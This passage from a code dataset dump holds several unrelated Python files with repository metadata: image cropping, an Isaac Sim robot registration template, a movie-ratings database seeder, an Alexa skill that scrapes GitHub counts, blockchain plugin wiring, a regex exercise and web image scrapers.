highlighter image files (*_untrimmed.png),\n# crops images to the right size\n# Author: Wenjie Deng\n# Date: 2023-05-04\n##########################################################################################\n\n\nimport sys, os\nimport argparse\nimport glob\n\n\ndef main(wdir):\n\tprint(\"\\n**** Crop highlighter images ****\\n\")\n\tfor file in glob.glob(os.path.join(wdir, '*_untrimmed.png')):\n\t\tcropfile = file.replace(\"_untrimmed.png\", \".png\")\n\t\tcropcommand = f\"convert -crop +0+150 -crop -0-50 {file} {cropfile}\"\n\t\tprint(cropcommand)\n\t\tos.system(cropcommand)\n\t\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--dir\", help=\"directory to hold input sequence fasta file\", nargs=\"?\", const=1, type=str, default=\".\")\n args = parser.parse_args()\n wdir = args.dir\n\n main(wdir)\n","repo_name":"MullinsLab/phylobook_pipeline","sub_path":"script/crop_images.py","file_name":"crop_images.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74458031184","text":"from ..benchmark_robots.benchmark_robot_registry import BenchmarkRobotRegistry\nfrom ..benchmark_robots.base_benchmark_robot_loader import BaseBenchmarkRobotLoader\nfrom ..benchmark_controllers import franka_controllers\n\nimport numpy as np\n\nfrom typing import Optional\nfrom omni.isaac.franka import Franka\n\n# This class is a singleton, and so it will be shared with the robot_registry that is used in extension.py\nrobot_registry = BenchmarkRobotRegistry()\n\"\"\"\n\nBefore running this script, enable the robot_benchmark extension in the Isaac Sim UI under \"Window->Extensions\".\nOpen \"Robot Benchmark\" from the toolbar and take a look at the drop-down menu. You will be able to select different robots\nand controllers written for those robots. Take note of what is already there.\n\nThen, come back to this example, and set RUN_EXAMPLE=True. This will add options to the drop-down menu. It will create a clone of the\nFranka robot under the name \"Example Robot\" that floats .1 m above the ground.\nIt will also create a controller for any Franka robot under the name \"Example Controller\".\nThis example_controller will be registered under our \"Example Robot\" Franka clone, and under the \"Franka\" robot that already appears in\nthe drop-down menu. The \"Franka\" robot will have this new controller added to its pre-existing list of supported controllers, and the\n\"Example Robot\" will have this controller as its only available controller.\n\n----------------------------\n\nScrolling down, you will see that this python file is written as a script inside an \"if RUN_EXAMPLE==True\" block. 
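crop_images.py above shells out to ImageMagick's convert. A hedged pure-Python equivalent of the same trim with Pillow; the geometry mirrors the -crop +0+150 / -crop -0-50 flags (150 px off the top, 50 px off the bottom), and Pillow is an extra dependency the original script does not use.

```python
from PIL import Image

def crop_like_convert(src_path, dst_path, top=150, bottom=50):
    # Same trim as: convert -crop +0+150 -crop -0-50 src dst
    img = Image.open(src_path)
    w, h = img.size
    img.crop((0, top, w, h - bottom)).save(dst_path)
```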
This script is always\nrun on the startup of the robot_benchmark extension because it is listed as a python module in \"extension.toml\".\n\nThe same goes for the empty folder \"robot_benchmark/user\".\nThe user should register any new robots or controllers in the \"robot_benchmark/user\" folder by copying the structure found in this template.\n\n-----------------------------\n\nNote that there is further explanation at the bottom of this script that is meant to be read after reading through the script.\n\n\"\"\"\n\nRUN_EXAMPLE = False\n\n# Here we create a RobotLoader that we can register in the robot_registry to have it become discoverable by the robot_benchmark extension\n\n\nclass ExampleRobotLoader(BaseBenchmarkRobotLoader):\n def __init__(self, name, **robot_kwargs):\n BaseBenchmarkRobotLoader.__init__(self, name, **robot_kwargs)\n\n # This is redundant with BaseBenchmarkRobotLoader.__init__ and is written here for clarity\n self._robot_kwargs = robot_kwargs\n\n # This is specific to this particular BaseBenchmarkRobotLoader\n self._articulation = None\n\n def load_robot(\n self,\n prim_path: str,\n name: str = \"Franka\",\n usd_path: Optional[str] = None,\n position: Optional[np.ndarray] = None,\n orientation: Optional[np.ndarray] = None,\n ):\n \"\"\"\n The optional arguments after name are not explicitly passed to the load_robot function. They are provided in the \n __init__() function to the ExampleRobotLoader class. They are listed as optional arguments here for clarity to show\n what some of the robot_kwargs may be for this specific load_function.\n \"\"\"\n\n self._articulation = Franka(prim_path, name, **self._robot_kwargs)\n\n return self._articulation\n\n def get_robot_articulation(self):\n return self._articulation\n\n # Other functions used in this example are already implemented in the BaseBenchmarkRobotLoader class.\n # See omni.isaac.robot_benchmark.benchmark_robots.base_benchmark_robot_loader.py for documentation\n\n\nif RUN_EXAMPLE:\n\n \"\"\"\n To make our example robot appear on the drop-down menu, we need to register it.\n Note that we can write the kwargs that we want to pass to the ExampleRobotLoader.load_robot() function \n when we register the robot. In this case, the Example Robot is set to float .1 m above the ground.\n \"\"\"\n\n # print(robot_registry.get_robot_options()) -> prints [\"Franka\"]\n\n example_robot_loader = ExampleRobotLoader(\n \"Example Robot\", position=np.array([0, 0, 0.1])\n ) # This string is the name of the robot in the benchmark log headers\n robot_registry.register_robot(\n \"Example Robot\", example_robot_loader\n ) # This string is the name of the robot as it appears in the drop-down menu\n\n # print(robot_registry.get_robot_options()) -> prints [\"Franka\", \"Example Robot\"]\n\n \"\"\"\n This is how you add a controller to an existing robot\n \"\"\"\n\n def example_controller_load_fun(**kwargs):\n # Implement a controller that fulfills the robot_benchmark.benchmark_controllers.base_benchmark_controller interface\n controller = franka_controllers.RMPFlowBenchmarkController(\n kwargs[\"controller_name\"], kwargs[\"robot_loader\"].get_robot_articulation()\n )\n return controller\n\n # This gets the Franka robot loader that is already registered in the robot registry. 
We can now register our example controller with the Franka\n franka_loader = robot_registry.get_robot_loader(\"Franka\")\n franka_loader.register_controller(\n \"Example Controller\",\n example_controller_load_fun,\n controller_name=\"Example Controller\",\n robot_loader=franka_loader,\n )\n\n # Add the controller to our example robot:\n example_robot_loader.register_controller(\n \"Example Controller\",\n example_controller_load_fun,\n controller_name=\"Example Controller\",\n robot_loader=example_robot_loader,\n )\n\n\n\"\"\"\nYou may be wondering a few things about this example script:\n\nWhat is a RobotLoader, and why is it necessary?\n A RobotLoader exists so that you can register a robot without initializing it until the correct moment.\n Isaac Sim has a few annoying properties around Articulations. When you load an Articulation, it gets added to \n the USD stage. You have to do this BEFORE pressing \"play\". But if you try to initialize the Articulation with \n Articulation.initialize() (which is necessary to control the robot), it will fail with confusing errors unless \"play\"\n has already been pressed. \n \n By filling in a BaseBenchmarkRobotLoader interface, the robot_benchmark extension takes care of timing these things \n appropriately. Additionally, you can write many robot_loaders, but only the robot_loader that is selected in the \n drop-down menu will actually place a robot on the stage. \n\nWhy is the controller registered the way it is? \n The controller is registered with a function to be called later because, once again, the timing needs to be correct to\n have everything get initialized without errors. In robot_benchmark.py, the controller load_function is called\n after the robot Articulation has been initialized. This structure allows for multiple controllers to be written for a robot,\n but only one controller will ever be initialized at a time.\n \n When writing a load_function for a controller, you may take in kwargs that you supply to the register_controller() function.\n These kwargs are stored internally to be passed along later when the load function is called. \n \n Notice in the example_controller_load_fun that one kwarg was the robot_loader object. \n The RMPFlow controller requires an initialized robot Articulation object to function. It would fail if,\n instead of passing the robot_loader as a kwarg, we passed an argument \"robot_articulation = robot_loader.get_robot_articulation()\".\n This is because at the time this script is run, robot_loader.get_robot_articulation() returns None because the robot \n has not been loaded yet. But, by the time that robot_benchmark.py calls the controller_load_function, the robot Articulation\n will have been initialized.\n\nWhat do you mean when you mention logs in robot_benchmark.py?\n When robot_benchmark is initialized, it can be set to log data to a json file. This is pointless when running it from the UI, but\n there is a provided standalone script for running the (environment,robot,policy) pairs of your choice with data logging. 
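The Q&A above describes a register-now, construct-later pattern for robots and controllers. Here is the idea in isolation, stripped of Isaac Sim specifics; Registry and its method names are illustrative, not the extension's actual classes.

```python
class Registry:
    """Illustrative registry: store factories now, construct later."""

    def __init__(self):
        self._factories = {}

    def register(self, name, load_fn, **kwargs):
        # Nothing is constructed yet; kwargs are held for the later call.
        self._factories[name] = (load_fn, kwargs)

    def create(self, name):
        # Construct only once the surrounding state is ready.
        load_fn, kwargs = self._factories[name]
        return load_fn(**kwargs)

registry = Registry()
registry.register("greeter", lambda greeting: greeting + ", world", greeting="hello")
print(registry.create("greeter"))  # hello, world
```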
See the \n top of the standalone_benchmark_runner.py script for a more detailed explanation.\n\"\"\"\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.robot_benchmark/omni/isaac/robot_benchmark/user_template/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11066795595","text":"import model\nimport csv\nimport datetime\n\n# open a file\n# read a line\n# parse a line\n# create an object\n# add the object to a session\n# commit\n# repeat until done\n\ndef load_users(session):\n # use u.user\n # id|age|gender|occupation|zipcode\n # 1|24|M|technician|85711\n with open('seed_data/u.user', 'rb') as f:\n reader = csv.reader(f, delimiter='|')\n for row in reader:\n new_user = model.User(age=int(row[1]), gender=row[2], zipcode=row[4])\n\n session.add(new_user)\n \n session.commit()\n\ndef load_movies(session):\n # use u.item\n with open('seed_data/u.item', 'rb') as f:\n reader = csv.reader(f, delimiter = \"|\")\n for row in reader:\n date_string = row[2]\n formatted_date = None # guard: u.item sometimes has a blank release date, which would otherwise leave this name unbound\n if date_string != \"\":\n pattern = \"%d-%b-%Y\"\n formatted_date = datetime.datetime.strptime(date_string, pattern)\n\n new_movie = model.Movies(name=row[1].decode(\"latin-1\"), released_at=formatted_date, imdb_url=row[4])\n\n session.add(new_movie)\n\n session.commit()\n\ndef load_ratings(session):\n # use u.data\n with open('seed_data/u.data', 'rb') as f:\n reader = csv.reader(f, delimiter = \"\\t\")\n for row in reader:\n new_rating = model.Ratings(user_id=row[0], movie_id=row[1], rating=row[2])\n\n session.add(new_rating)\n\n session.commit()\n\n\ndef main(session):\n # You'll call each of the load_* functions with the session as an argument\n load_users(session)\n load_movies(session)\n load_ratings(session)\n\nif __name__ == \"__main__\":\n s = model.connect()\n main(s)\n","repo_name":"rrude/Ratings_SQLAlchemy","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70788864785","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nimport urllib, json, time, urllib2\nfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n # 'card': {\n # 'type' : 'Simple',\n # 'title': title,\n # 'content': output\n # },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\ndef continue_dialog(sessionAttributes):\n \n message = {}\n message['shouldEndSession'] = False\n message['directives'] = [{'type': 'Dialog.Delegate'}]\n \n return build_response(sessionAttributes, message)\n\n# --------------- Functions that control the skill's 
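The load_movies guard added above matters because a u.item release-date field can be blank. The parse-or-None step on its own, as a tiny standalone check; the sample date is illustrative:

```python
import datetime

def parse_release(date_string):
    # u.item uses dates like 01-Jan-1995; blank means unknown
    if not date_string:
        return None
    return datetime.datetime.strptime(date_string, "%d-%b-%Y")

print(parse_release("01-Jan-1995"))  # 1995-01-01 00:00:00
print(parse_release(""))             # None
```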
behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the Amazon Alexa GitHub Skills Kit. \" \\\n \"Please tell me your username by saying link to Username, \" \\\n \"and then follow the voice guide.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please tell me your username by saying link to Username, \" \\\n \"and then follow the voice guide.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Amazon Alexa GitHub Skills Kit. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \n\ndef outputTryAgain(session) :\n '''\n Ask the user to try again\n '''\n sessionAttributes = session['attributes']\n card_title = \"Try again\"\n speech_output = \"Please try again. I failed to catch you.\"\n\n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \ndef openGitHub() :\n '''\n Ask the user for the user name\n '''\n card_title = \"Personalise your experience\"\n speech_output = \"Please enter your Username \"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getUsername(intent, session) :\n '''\n Parse the user name entered by the user\n '''\n session_attributes = {}\n\n session_attributes['username'] = intent['slots']['username']['value']\n card_title = \"Username\"\n speech_output = \"Thanks! We are now linked to :\" + session_attributes['username'] + \\\n \". 
Please mention the service you want to use by saying commit/issue/pull requests/forks/stars.\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getCommit(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Commit to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['date'] = intent_request['intent']['slots']['date']['value']\n speech_output = \"For which repo you want to see the commit\"\n \n sessionAttributes['work'] = \"commits\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getIssue(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Issue to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['repo'] = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + sessionAttributes['repo'])\n soup = BeautifulSoup(html.read())\n \n page_nav = soup.find(\"nav\", {\"class\" : \"reponav js-repo-nav js-sidenav-container-pjax container\"})\n spans = page_nav.find_all(\"span\", {\"class\" : \"Counter\"})\n \n num_issues = spans[0].get_text()\n \n speech_output = \"There are \" + str(num_issues) + \" issue(s) for \" + sessionAttributes['repo']\n \n sessionAttributes['work'] = \"issues\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getPullRequest(intent_request, session) :\n '''\n Ask for the repository name\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Pull request to Repo redirect\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n sessionAttributes['repo'] = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + sessionAttributes['repo'])\n soup = BeautifulSoup(html.read())\n \n page_nav = soup.find(\"nav\", {\"class\" : \"reponav js-repo-nav js-sidenav-container-pjax container\"})\n spans = page_nav.find_all(\"span\", {\"class\" : \"Counter\"})\n \n num_pull_request = spans[1].get_text()\n \n speech_output = \"There are \" + str(num_pull_request) + \" pull request(s) for \" + sessionAttributes['repo']\n \n sessionAttributes['work'] = \"Pull request\"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getRepository(intent, session) : \n ''' \n Check for the commit on the specified date\n '''\n \n sessionAttributes = session['attributes']\n card_title = \"Repo scraper\"\n # 
speech_output = \"This part is currently under construction... Sorry for Inconvenience\"\n repo_name = intent['slots']['repository']['value']\n \n git_repo_link = \"https://www.github.com/\" + sessionAttributes['username'] + \"/\" + repo_name + \"/\" + sessionAttributes['work'] + \"/master\"\n \n speech_output = \"Please go through this link to see the \" + sessionAttributes['work'] + \" : \" + git_repo_link\n # Setting this to true ends the session and exits the skill.\n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef getForks(intent_request, session) :\n '''\n This function returns the number of forks for the user asked repo\n '''\n sessionAttributes = session['attributes']\n card_title = \"Forks\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n repo_name = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + repo_name)\n soup = BeautifulSoup(html.read())\n \n page_head = soup.find(\"ul\", {\"class\" : \"pagehead-actions\"})\n \n i = 2 ## for forks\n page_head_li = page_head.find_all(\"li\")\n page_head_li[i] = page_head_li[i].get_text()\n page_head_li[i] = str(page_head_li[i])\n page_head_li[i] = page_head_li[i].replace(\" \", \"\")\n page_head_li[i] = page_head_li[i].replace(\"\\n\", \"\")\n\n num_forks = page_head_li[i][4 :]\n \n speech_output = \"There are \" + str(num_forks) + \" fork(s) for \" + str(repo_name)\n # print(soup)\n \n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n \n\ndef getStars(intent_request, session) :\n '''\n This function returns the number of forks for the user asked repo\n '''\n sessionAttributes = session['attributes']\n card_title = \"Stars\"\n \n dialog_state = intent_request['dialogState']\n\n if dialog_state in (\"STARTED\", \"IN_PROGRESS\"):\n return continue_dialog(sessionAttributes)\n \n repo_name = intent_request['intent']['slots']['repo']['value']\n \n html = urlopen(\"https://github.com/\" + sessionAttributes['username'] + \"/\" + repo_name)\n soup = BeautifulSoup(html.read())\n \n \n page_head = soup.find(\"ul\", {\"class\" : \"pagehead-actions\"})\n \n i = 1 ## for stars\n page_head_li = page_head.find_all(\"li\")\n page_head_li[i] = page_head_li[i].get_text()\n page_head_li[i] = str(page_head_li[i])\n page_head_li[i] = page_head_li[i].replace(\" \", \"\")\n page_head_li[i] = page_head_li[i].replace(\"\\n\", \"\")\n\n \n num_stars = page_head_li[i][4 :]\n \n speech_output = \"There are \" + str(num_stars) + \" star(s) for \" + str(repo_name)\n # print(soup)\n \n should_end_session = False\n return build_response(sessionAttributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # 
Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n \n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n \n try :\n # Dispatch to your skill's intent handlers\n if intent_name == \"opengithub\":\n return openGitHub()\n if intent_name == \"usernameInput\":\n return getUsername(intent, session)\n elif intent_name == \"commit\":\n return getCommit(intent_request, session)\n elif intent_name == \"issue\" :\n return getIssue(intent_request, session)\n elif intent_name == \"pullrequest\" :\n return getPullRequest(intent_request, session)\n elif intent_name == \"repositoryName\":\n return getRepository(intent, session)\n elif intent_name == \"forks\" :\n return getForks(intent_request, session)\n elif intent_name == \"stars\" :\n return getStars(intent_request, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n except :\n return outputTryAgain(session)\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n \n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n \n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"Deepank308/Alexa-GitHub-Scraper","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":14463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70901105107","text":"from ape import plugins\nfrom ape.api.networks import LOCAL_NETWORK_NAME, ForkedNetworkAPI, NetworkAPI, create_network_type\nfrom ape_geth import GethProvider\nfrom ape_test import LocalProvider\n\nfrom .ecosystem import NETWORKS, PolygonZkEVM, PolygonZkEVMConfig\n\n\n@plugins.register(plugins.Config)\ndef config_class():\n return PolygonZkEVMConfig\n\n\n@plugins.register(plugins.EcosystemPlugin)\ndef ecosystems():\n yield PolygonZkEVM\n\n\n@plugins.register(plugins.NetworkPlugin)\ndef networks():\n for network_name, network_params in NETWORKS.items():\n yield \"polygon-zkevm\", network_name, create_network_type(*network_params)\n yield \"polygon-zkevm\", f\"{network_name}-fork\", ForkedNetworkAPI\n\n # NOTE: This works for local providers, as they get chain_id from themselves\n yield \"polygon-zkevm\", LOCAL_NETWORK_NAME, NetworkAPI\n\n\n@plugins.register(plugins.ProviderPlugin)\ndef providers():\n for network_name in NETWORKS:\n yield \"polygon-zkevm\", network_name, GethProvider\n\n yield \"polygon-zkevm\", LOCAL_NETWORK_NAME, LocalProvider\n","repo_name":"ApeWorX/ape-polygon-zkevm","sub_path":"ape_polygon_zkevm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30614751285","text":"# QUESTION URL: https://www.hackerrank.com/challenges/re-start-re-end/problem\n# STATUS: Wrong Answer\n\nS = input()\nk = input()\nimport re\npattern = re.compile(k)\nr = pattern.search(S)\nif bool(r): print(\"(-1, -1)\")\nwhile r:\n print(\"({0}, {1})\".format(r.start(), r.end() - 1))\n r = pattern.search(S,r.start() + 1)\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/hackerrank/Re_start_____Re_end__/Re_start_____Re_end___2.py","file_name":"Re_start_____Re_end___2.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11025875467","text":"import logging\nimport os\nimport random\nimport time\nimport urllib\nfrom typing import Any, Dict, List, Tuple\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import 
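The Alexa GitHub skill earlier in this section scrapes GitHub's HTML by CSS class, which breaks whenever the page markup changes. A hedged Python 3 alternative using GitHub's public REST API, which exposes the same counts as stable JSON fields; requests stands in for urllib2, and the sample repo is arbitrary.

```python
import requests

def repo_counts(user, repo):
    # Unauthenticated calls to api.github.com are rate-limited but fine for a demo.
    r = requests.get(f"https://api.github.com/repos/{user}/{repo}")
    r.raise_for_status()
    data = r.json()
    return (data["forks_count"], data["stargazers_count"],
            data["open_issues_count"])

print(repo_counts("joshspeagle", "dynesty"))
```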
Options\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom tqdm import tqdm\n\n# shutil and urllib.request are used below but were missing from the original imports\nimport shutil\nimport urllib.request\n\nlogger = logging.getLogger(__name__)\n\n\ndef _create_initial_driver(driver_path: str, search_url: str) -> WebDriver:\n \"\"\"This function creates a chrome web-driver.\n\n Args:\n driver_path (str): Path of where the webdriver is saved\n search_url (str): String of which website to scrape\n\n Returns:\n WebDriver: Chrome webdriver\n \"\"\"\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--remote-debugging-port=9222\")\n\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n driver.get(search_url)\n\n assert driver.title != \"\", \"The driver did not fetch the website\"\n return driver\n\n\ndef _find_images(driver: WebDriver) -> Tuple[List[WebElement], int]:\n image_elements = driver.find_elements_by_css_selector(\n \".ReactGridGallery_tile-viewport\"\n )\n return image_elements, len(image_elements)\n\n\ndef _random_waiting_time(min_seconds_sleep: int, max_seconds_sleep: int) -> float:\n return random.uniform(min_seconds_sleep, max_seconds_sleep)\n\n\ndef _create_expanded_driver(driver_params, image_params) -> WebDriver:\n\n driver_path = driver_params[\"driver_path\"]\n max_seconds_sleep = driver_params[\"max_seconds_sleep\"]\n min_seconds_sleep = driver_params[\"min_seconds_sleep\"]\n search_url = image_params[\"url\"]\n max_number_of_images = image_params[\"max_number_of_images\"]\n\n driver = _create_initial_driver(driver_path, search_url)\n\n _, number_of_images_visible = _find_images(driver)\n\n while number_of_images_visible < max_number_of_images:\n time.sleep(_random_waiting_time(min_seconds_sleep, max_seconds_sleep))\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n _, number_of_images_visible = _find_images(driver)\n logger.info(f\"Images found {number_of_images_visible} of {max_number_of_images}\")\n\n logger.info(f\"In total we found {number_of_images_visible} images\")\n\n return driver\n\n\ndef _retrieve_image_source(image_element, image_num) -> str:\n try:\n image_src_element = image_element.find_element_by_css_selector(\"img\")\n img_src = image_src_element.get_attribute(\"src\")\n return img_src\n except NoSuchElementException:\n return None\n\n\ndef _delete_all_files_in_folder(folder_path: str) -> None:\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(\"Failed to delete %s. 
Reason: %s\" % (file_path, e))\n\n\ndef _scrape_images(\n image_folder_path: str,\n image_elements: List[WebElement],\n number_of_total_entries: int,\n) -> None:\n\n for image_num, image_element in tqdm(enumerate(image_elements)):\n\n image_path = os.path.join(image_folder_path, f\"marathon_{image_num}.png\")\n img_src = _retrieve_image_source(image_element, image_num)\n if img_src is None:\n # log and skip instead of passing None to urlretrieve\n logger.warning(f\"Image {image_num} could not be retrieved\")\n continue\n\n urllib.request.urlretrieve(img_src, image_path)\n\n\ndef scrapping_images(params: Dict[str, Any]) -> None:\n\n driver_params = params[\"driver\"]\n image_params = params[\"image_scrapping\"]\n image_folder_path = image_params[\"image_folder\"]\n rescrape_bool = image_params[\"rescrape\"]\n\n driver = _create_expanded_driver(driver_params, image_params)\n image_elements, number_of_total_entries = _find_images(driver)\n\n if rescrape_bool:\n _delete_all_files_in_folder(image_folder_path)\n _scrape_images(image_folder_path, image_elements, number_of_total_entries)\n logger.info(\"Image re-scrapping finished\")\n else:\n logger.info(\"No re-scraping was conducted\")\n","repo_name":"paulmora-qb/legendary-broccoli","sub_path":"src/legendary_broccoli/pipelines/scrapping/scrapping_functions.py","file_name":"scrapping_functions.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11322684682","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup \r\nurl=input('Enter url: ')\r\nhtml=urlopen(url).read()\r\nSoup=BeautifulSoup(html,'html.parser')\r\ntags=Soup('span')\r\n\r\ntotal=0\r\nfor tag in tags:\r\n x = tag.contents[0]\r\n total+= int(x)\r\nprint(total) \r\n\r\n ","repo_name":"akshitaPrajapati/Web-Scraping","sub_path":"ScrapHTML.py","file_name":"ScrapHTML.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74190970704","text":"#! /usr/bin/python3.6\n\n\"\"\"Annotates the result of map_to_symbols with heuristic type information.\n\nThis file must be run after the following binaries, using the same --out_path:\n- dump_sections.py (to generate section_info and linked section .raw files)\n- map_to_symbols.py (to generate map_symbols.csv)\n\nThis program augments the output of map_to_symbols.py, adding file-level and\nRAM addresses of the identified symbols, as well as heuristically predicted\ncommon types (e.g. 
